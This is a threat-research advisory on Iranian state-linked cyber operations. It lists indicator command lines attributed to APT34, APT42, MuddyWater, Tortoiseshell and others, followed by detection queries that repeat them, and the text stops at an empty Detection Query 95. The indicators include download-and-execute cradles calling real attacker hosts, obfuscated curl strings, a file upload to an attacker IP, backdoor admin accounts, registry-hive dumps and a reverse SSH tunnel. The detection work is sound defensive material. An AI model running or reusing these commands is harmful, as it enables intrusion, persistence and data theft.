The Iranian Cyber Capability 2026

    Tuesday, March 10, 2026 In: Threat Research Print

    Date: 03/10/2026

    Severity: Critical

    Summary

    Between 2024 and March 2026, the geopolitical landscape around Iran has shifted dramatically. What was once a tense but predictable standoff has escalated into a major regional crisis. In 2024, Iran began moving from proxy warfare toward direct military confrontation, marked by ballistic missile exchanges with Israel. Its “Axis of Resistance” still functioned then, with Syria serving as a key land bridge to supply Hezbollah in Lebanon. Cyber operations were largely conducted by the IRGC and the Ministry of Intelligence and Security against Iran’s adversaries. However, after coordinated U.S. and Israeli strikes in February 2026, Iran’s deterrence, cyber capabilities, and proxy network have been severely weakened.

    Indicators of Compromise (IOC) List

    Commandline : 

    Threat Actor

    Command Line

     

    APT34

    powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1

     

    APT35

    conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Biography of Mr.leehu hacohn.pdf';$pdl='Biography of Mr.leehu hacohn.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\Wow" `} ;

     

    APT42

    powershell -w 1 "$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm "i*x) $Pbwpc"

     

    APT42

    copy-item C:/Users/{USER}/AppData/Local/Microsoft/Outlook/@example.com.ost ` $env:APPDATA/victim@example.com.ost

     

    APT42

    rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk

     

    APT42

    powershell -w 1 "$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu"

     

    APT42

    start msedge \""hxxps[://]1drv[.]ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\";

     

    APT42

    Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Renovation' -Value "cmd /c \"for %a in (\"%localappdata%\Microsoft\Internet Explorer\List\*\") do ( start \"\" \"%a\" )\""

     

    APT42

    cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d "id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf\" -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt \"\" \"%temp%\\down.v7bs\" & call %b:7=%

     

    APT42

    conhost --headless %PUBLIC%\Microsoft.bat

     

    APT42

    %LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <chrome_pid>

     

    APT42

    curl.exe -X POST "https://<FIREBASE-ENDPOINT>.json" -H "Content-Type: application/json" -d "{\"LastUpdatTime\":{\".sv\":\"timestamp\"}}" --ssl-no-revoke"

     

    APT42

    powershell -w 1 $pnt=(Get-Content -Path 

    %APPDATA%\Microsoft\documentLoger.txt); &(gcm "i*x)$pnt

     

    APT42

    cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%

     

    APT42

    "%WINDIR%\System32\cmd.exe" /c set hm="cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %%tmolbp%% " & call %%hm:olb=%%

     

    APT42

    msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000

     

    APT42

    powershell -w 1 "$lb='gBjs';$uq=(invoke-restmethod -UserAgent 'Chrome' 'https://line.completely.workers.dev/aoh52');.(gcm i*ee*)$uq"

     

    Cyber Av3ngers

    uname -v > /tmp/{RANDOM_16_chars}.txt 2>&1

     

    Cyber Av3ngers

    hostname > /tmp/{RANDOM_16_chars}.txt 2>&1

     

    Cyber Av3ngers

    whoami > /tmp/{RANDOM_16_chars}.txt 2>&1

     

    Cyber Av3ngers

    date +%Z > /tmp/{RANDOM_16_chars}.txt 2>&1

     

    Cyber Av3ngers

    uname -r > /tmp/{RANDOM_16_chars}.txt 2>&1

     

    Cyber Av3ngers

    curl --http2 --header "accept: application/dns-json" "https://1.1.1.1/dns-query?name=google.com

     

    Dust Specter

    $di='%ALLUSERSPROFILE%\WinWebex';md $di 2>"";$path=$di+'\WinWebex.exe';Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0');[IO.File]::WriteAllBytes($path, $c.GetAsync('https://meetingapp.site/webexdownload').Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;

     

    Dust Specter

    "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe";New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'VLC' -Value '%ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe' -PropertyType String;New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WingetUI' -Value '%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe' -PropertyType String;

     

    Infy

    chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah

     

    Infy

    chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah

     

    MuddyWater

    "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1

     

    MuddyWater

    "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline"

     

    MuddyWater

    "%WINDIR%\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv

     

    MuddyWater

    "%WINDIR%\system32\reg.exe" "%WINDIR%\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv

     

    MuddyWater

    netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url

     

    MuddyWater

    schtasks /create /tn ForceNetbirdRestart

     

    MuddyWater

    net localgroup Administrators user /add

     

    MuddyWater

    sc config sshd start= auto

     

    MuddyWater

    sc config netbird start= delayed-auto

     

    MuddyWater

    wmic useraccount where name='user' set passwordexpires=false

     

    MuddyWater

    net localgroup Administrateurs user /add

     

    MuddyWater

    powershell.exe -WindowStyle Hidden

     

    MuddyWater

    net user user Bs@202122 /add

     

    MuddyWater

    powershell.exe -Command "Copy-Item -Path %%malware path%% -Destination '%ALLUSERSPROFILE%\Logs' -Force"

     

    MuddyWater

    "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression

     

    MuddyWater

    schtasks /create /sc daily /st 09:00 /tn "DailyUpdate" /tr "%PUBLIC%\Downloads\novaservice.exe"

     

    MuddyWater

    powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]

     

    MuddyWater

    $wc = New-Object System.Net.WebClient; $wc.UploadFile("hxxp://143[.]198[.]5[.]41:443/success","%PUBLIC%\downloads\cobe-notes.txt");

     

    MuddyWater

    taskkill /IM novaservice.exe

     

    MuddyWater

    Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden

     

    MuddyWater

    "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE" /n

     

    MuddyWater

    %WINDIR%\System32\cmd.exe" /c %ALLUSERSPROFILE%\CertificationKit.ini

     

    Parisite

    TNC <DC-2 IP> -Port 135

     

    Parisite

    ipconfig /all

     

    Parisite

    .\SOCKSSrv.exe

     

    Parisite

    netstat -nao|findstr 28443

     

    Parisite

    ssh 104[.]238[.]191[.]185 -P 443

     

    Parisite

    ssh 104[.]238[.]191[.]185 -p 443

     

    Parisite

    Enter-PSSession -ComputerName <DC-2 IP>

     

    Parisite

    TNC <DC-2 IP> -Port 389

     

    Parisite

    netstat -nao|findstr 443

     

    Parisite

    cmd

     

    Parisite

    .\SOCKSSrv.exe

     

    Parisite

    netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443

     

    Parisite

    netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443

     

    Parisite

    netsh i p re all

     

    Parisite

    .\443.exe

     

    Parisite

    %WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe

     

    Tortoiseshell

    cmd.exe /C systeminfo | findstr /I "Domain"

     

    Tortoiseshell

    "%PROGRAMFILES%\WinRAR\RAR.exe" a -v1000m -m5 "%PROGRAMFILES%\WinRAR\{COMPANY_NAME}.rar" "C:/Users/{USERNAME}/AppData/Local/Microsoft/Outlook/%"

     

    Tortoiseshell

    net user DC-01$ P@ssw0rd

     

    Tortoiseshell

    %WINDIR%\system32\openssh\ssh.exe[Username]@[IP Address] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070

     

    Tortoiseshell

    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f

     

    Tortoiseshell

    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f

     

    Tortoiseshell

    SCCM.exe reconfig /target:[REDACTED]

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1%"

    Detection Query 2 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "%$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm%" and commandline like "i*x)$Pbwpc"

    Detection Query 3 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%copy-item C:/Users/%/AppData/Local/Microsoft/Outlook/% $env:APPDATA/%.ost%"

    Detection Query 4 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk%"

    Detection Query 5 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "%$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu%"

    Detection Query 6 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "start msedge" and commandline like "https://1drv.ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\"

    Detection Query 7 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d" and commandline like "%id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf%" and commandline like "-X PO7ST https://prism-west-candy.glitch.me/Down" and commandline like "-o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt%" and commandline like "%temp%\\down.v7bs\ & call %b:7=%"

    Detection Query 8 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%conhost --headless %PUBLIC%\Microsoft.bat%"

    Detection Query 9 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <%>%"

    Detection Query 10 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "curl.exe -X POST" and commandline like "https://<FIREBASE-ENDPOINT>.json" and commandline like "-H" and commandline like "Content-Type: application/json" and commandline like "-d%" and commandline like "--ssl-no-revoke"

    Detection Query 11 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1" and commandline like "%$pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt);&(gcm%" and commandline like "i*x)$pnt"

    Detection Query 12 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%"

    Detection Query 13 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "/c set hm=" and commandline like "%cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https://linolbe.complolbetely.workolbers.deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %tmolbp%" and commandline like "& call %hm:olb=%"

    Detection Query 14 :

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000"

    Detection Query 15:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell -w 1 " and commandline like "$lb=" and commandline like "gBjs" and commandline like ";$uq=(invoke-restmethod -UserAgent Chrome https://line.completely.workers.dev/aoh52) c;.(gcm i*ee*)$uq"

    Detection Query 16:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "curl --http2 --header " and commandline like "accept: application/dns-json" and commandline like "https://1.1.1.1/dns-query?name=google.com"

    Detection Query 17:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe" and commandline like "New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name VLC -Value %ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe -PropertyType String;New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name WingetUI -Value %ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe -PropertyType String;%"

    Detection Query 18:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 19:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 20:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "%-exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1%"

    Detection Query 21:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe%" and commandline like "%/noconfig %" and commandline like "%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline%"

    Detection Query 22:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 23:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 24:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url"

    Detection Query 25:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "schtasks /create /tn ForceNetbirdRestart"

    Detection Query 26:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net localgroup Administrators user /add"

    Detection Query 27:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "sc config sshd start= auto"

    Detection Query 28:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "sc config netbird start= delayed-auto"

    Detection Query 29:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%wmic useraccount where name='%' set passwordexpires=false%"

    Detection Query 30:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net localgroup Administrateurs user /add"

    Detection Query 31:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -WindowStyle Hidden"

    Detection Query 32:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net user user Bs@202122 /add"

    Detection Query 33:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -Command " and commandline like "%Copy-Item -Path % -Destination %ALLUSERSPROFILE%\Logs -Force%"

    Detection Query 34:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51/57576?filter_relational_operator_2=60169).content" and commandline like "Invoke-Expression"

    Detection Query 35:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%schtasks /create /sc daily /st % /tn %" and commandline like "DailyUpdate" and commandline like "/tr " and commandline like "%PUBLIC%\Downloads\novaservice.exe%"

    Detection Query 36:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]"

    Detection Query 37:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "$wc = New-Object System.Net.WebClient;" and commandline like "$wc.UploadFile http://143.198.5.41:443/success" and commandline like "%PUBLIC%\downloads\cobe-notes.txt;%"

    Detection Query 38:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "taskkill /IM novaservice.exe"

    Detection Query 39:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden%"

    Detection Query 40:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE%"

    Detection Query 41:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "%/c %ALLUSERSPROFILE%\CertificationKit.ini%"

    Detection Query 42:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%TNC <%> -Port 135%"

    Detection Query 43:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like ".\SOCKSSrv.exe"

    Detection Query 44:

    resourcename = "Windows Security" and eventtype = "4688" and (commandline like "netstat -nao" or commandline like "findstr 28443")

    Detection Query 45:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%Enter-PSSession -ComputerName <%>%"

    Detection Query 46:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%TNC <%> -Port 389%"

    Detection Query 47:

    resourcename = "Windows Security" and eventtype = "4688" and (commandline like "netstat -nao" or commandline like "findstr 443")

    Detection Query 48:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "netsh i p re all"

    Detection Query 49:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like ".\443.exe"

    Detection Query 50:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe%"

    Detection Query 51:

    resourcename = "Windows Security" and eventtype = "4688" and (commandline like "cmd.exe /C systeminfo" or commandline like "findstr /I")

    Detection Query 52:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%PROGRAMFILES%\WinRAR\RAR.exe%" and commandline like "a -v1000m -m5" and commandline like "%PROGRAMFILES%\WinRAR\%.rar%" and commandline like "%C:/Users/%/AppData/Local/Microsoft/Outlook/%"

    Detection Query 53:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "net user DC-01$ P@ssw0rd"

    Detection Query 54:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "%WINDIR%\system32\openssh\ssh.exe[%]@[%] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070%"

    Detection Query 55:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" and commandline like "/va /f"

    Detection Query 56:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "reg delete" and commandline like "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" and commandline like "/f"

    Detection Query 57:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "SCCM.exe reconfig /target:[REDACTED]"

    Detection Query 58:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Renovation -Value" and commandline like "cmd /c \"

    Detection Query 59:

    resourcename = "Windows Security" and eventtype = "4688" and commandline like "$path=$di+\WinWebex.exe;Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0);[IO.File]::WriteAllBytes($path, $c.GetAsync(https://meetingapp.site/webexdownload).Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;"

    Detection Query 60:

    technologygroup = "EDR" and commandline like "%powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1%"

    Detection Query 61:

    technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "%$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm%" and commandline like "i*x)$Pbwpc"

    Detection Query 62:

    technologygroup = "EDR" and commandline like "%copy-item C:/Users/%/AppData/Local/Microsoft/Outlook/% $env:APPDATA/%.ost%"

    Detection Query 63:

    technologygroup = "EDR" and commandline like "%rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk%"

    Detection Query 64:

    technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "%$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu%"

    Detection Query 65:

    technologygroup = "EDR" and commandline like "start msedge" and commandline like "https://1drv.ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\"

    Detection Query 66:

    technologygroup = "EDR" and commandline like "cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d" and commandline like "%id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf%" and commandline like "-X PO7ST https://prism-west-candy.glitch.me/Down" and commandline like "-o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt%" and commandline like "%temp%\\down.v7bs\ & call %b:7=%"

    Detection Query 67:

    technologygroup = "EDR" and commandline like "%conhost --headless %PUBLIC%\Microsoft.bat%"

    Detection Query 68:

    technologygroup = "EDR" and commandline like "%LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <%>%"

    Detection Query 69:

    technologygroup = "EDR" and commandline like "curl.exe -X POST" and commandline like "https://<FIREBASE-ENDPOINT>.json" and commandline like "-H" and commandline like "Content-Type: application/json" and commandline like "-d%" and commandline like "--ssl-no-revoke"

    Detection Query 70:

    technologygroup = "EDR" and commandline like "powershell -w 1" and commandline like "%$pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt);&(gcm%" and commandline like "i*x)$pnt"

    Detection Query 71:

    technologygroup = "EDR" and commandline like "%cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%"

    Detection Query 72:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\cmd.exe%" and commandline like "/c set hm=" and commandline like "%cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https://linolbe.complolbetely.workolbers.deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %tmolbp%" and commandline like "& call %hm:olb=%"

    Detection Query 73:

    technologygroup = "EDR" and commandline like "msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000"

    Detection Query 74:

    technologygroup = "EDR" and commandline like "powershell -w 1 " and commandline like "$lb=" and commandline like "gBjs" and commandline like ";$uq=(invoke-restmethod -UserAgent Chrome https://line.completely.workers.dev/aoh52) c;.(gcm i*ee*)$uq"

    Detection Query 75:

    technologygroup = "EDR" and commandline like "curl --http2 --header " and commandline like "accept: application/dns-json" and commandline like "https://1.1.1.1/dns-query?name=google.com"

    Detection Query 76:

    technologygroup = "EDR" and commandline like "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe" and commandline like "New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name VLC -Value %ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe -PropertyType String;New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name WingetUI -Value %ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe -PropertyType String;%"

    Detection Query 77:

    technologygroup = "EDR" and commandline like "chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 78:

    technologygroup = "EDR" and commandline like "chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah"

    Detection Query 79:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "%-exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1%"

    Detection Query 80:

    technologygroup = "EDR" and commandline like "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe%" and commandline like "%/noconfig %" and commandline like "%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline%"

    Detection Query 81:

    technologygroup = "EDR" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 82:

    technologygroup = "EDR" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "%WINDIR%\system32\reg.exe%" and commandline like "save HKLM\SYSTEM SystemBkup.hiv"

    Detection Query 83:

    technologygroup = "EDR" and commandline like "netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url"

    Detection Query 84:

    technologygroup = "EDR" and commandline like "schtasks /create /tn ForceNetbirdRestart"

    Detection Query 85:

    technologygroup = "EDR" and commandline like "net localgroup Administrators user /add"

    Detection Query 86:

    technologygroup = "EDR" and commandline like "sc config sshd start= auto"

    Detection Query 87:

    technologygroup = "EDR" and commandline like "sc config netbird start= delayed-auto"

    Detection Query 88:

    technologygroup = "EDR" and commandline like "%wmic useraccount where name='%' set passwordexpires=false%"

    Detection Query 89:

    technologygroup = "EDR" and commandline like "net localgroup Administrateurs user /add"

    Detection Query 90:

    technologygroup = "EDR" and commandline like "powershell.exe -WindowStyle Hidden"

    Detection Query 91:

    technologygroup = "EDR" and commandline like "net user user Bs@202122 /add"

    Detection Query 92:

    technologygroup = "EDR" and commandline like "powershell.exe -Command " and commandline like "%Copy-Item -Path % -Destination %ALLUSERSPROFILE%\Logs -Force%"

    Detection Query 93:

    technologygroup = "EDR" and commandline like "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe%" and commandline like "(Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51/57576?filter_relational_operator_2=60169).content" and commandline like "Invoke-Expression"

    Detection Query 94:

    technologygroup = "EDR" and commandline like "%schtasks /create /sc daily /st % /tn %" and commandline like "DailyUpdate" and commandline like "/tr " and commandline like "%PUBLIC%\Downloads\novaservice.exe%"

    Detection Query 95:

